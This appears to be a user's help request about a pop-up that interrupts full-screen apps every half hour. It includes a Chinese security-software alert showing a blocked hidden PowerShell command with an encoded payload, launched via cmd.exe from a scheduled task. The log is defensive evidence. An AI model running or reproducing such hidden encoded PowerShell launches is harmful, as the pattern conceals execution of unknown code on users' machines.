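It pops up every half hour and forcibly interrupts my full-screen application. I ran a full-disk virus scan and found no problems. What is going on, and how do I fix it?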
防护项目:隐藏执行PowerShell
执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
执行命令行:powershell -WindowStyle Hidden -E "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
操作结果:已阻止
进程ID:7296
操作进程:C:\Windows\System32\cmd.exe
操作进程命令行:C:\Windows\system32\cmd.EXE /c powershell -WindowStyle Hidden -E "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
父进程ID:2328
父进程:C:\Windows\System32\svchost.exe
父进程命令行:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule